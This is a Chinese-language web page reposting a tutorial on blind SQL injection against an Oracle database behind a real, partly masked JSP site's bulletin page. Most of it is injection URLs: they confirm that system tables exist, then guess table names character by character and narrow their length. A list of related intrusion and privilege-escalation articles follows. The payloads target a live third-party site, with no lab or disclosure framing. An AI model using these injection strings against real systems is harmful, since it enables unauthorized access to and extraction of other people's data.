RSS订阅
首先需要看一下系统表是否存在,一般都是存在的,没有就没得玩了,只能回家抱孩子了。提交URL:
| http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from all_tables) and '1'='1 |
| http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tables) and '1'='1 http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tab_columns) AND '1'='1 |
图2
都正确返回,说明存在猜测的系统表。下面看我们怎么猜它的其他表名(注意:Oracle里的表名、列名都是要大写的,要注意输写,还有下面用的到Length()、Substr()等函数的说明,请查看相关资料)。
| http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tables where substr(table_name,1,1)='P') and '1'='1 http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tables where substr(table_name,1,2)='PL') and '1'='1 |
SQL Injection可谓是长盛不衰的话题了,从ASP+MSSQL到PHP+MYSQL,一路走来也可谓是一路艰辛,其实只要我们灵活利用SQL语句,说不定就会给自己带来意外的收获。
我们再来看看这个表的长度,确定一下范围才好猜,不然不知道要猜到什么时候才能结束:
| http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0<>(select count(*) from user_tables where length(table_name)>8 and table_name like'%25PL%25') and '1'='1 |
顶一下
(1)
100%
踩一下
(0)
0%
服务器安全资讯网(Fuancn.CN)登载此文仅为传递更多信息之目的,并不意味着赞同其观点或证实其描述。
上一篇:企业服务器安全性测试 SQL Server弱口令测试 下一篇:sql server 2005注入技巧集
相关文章列表
- 黑客技巧:提权技术研究_Discuz!管理
- 黑客攻防之全程追踪入侵JSP网站服
- 教你怎样利用oracle得Shell
- 我在入侵渗透中用过的三则VBS代码
- 将MYSQL读写权限转化为system权限
- Mysql入侵提权 打造全功能MYSQL入侵
- 对mysql提权一些总结
- MySQL提权简单方法
- PHP主机如何利用MYSQL提权
- PHP注入+MYSQL=SYSTEM权限
- mix.dll提权常用,mysql提权
- 教你如何通过Mysql弱口令得到系统权
- 入侵时隐藏自己的真正身份
- 黑客入门必须掌握8个DOS命令
- 黑客知识:简单识别服务器操作系统
- 利用DedeCms最新漏洞入侵网站
- 黑客入侵万象服务器的方法
- 入侵宝典 用SlimFTP将肉鸡改为私人服
- SQL注射修改难猜解的MD5
- 黑客攻破SQL服务器系统的十种方法
- Microsoft SQL Server SA权限最新入侵方法
- 记一次成功入侵Solaris服务器(sun)
- 网络安全教程:木马是怎样攻入E
- SQL注射原理超浓缩简单篇
相关图片列表
|
|
|
|
|
|
|
|
|
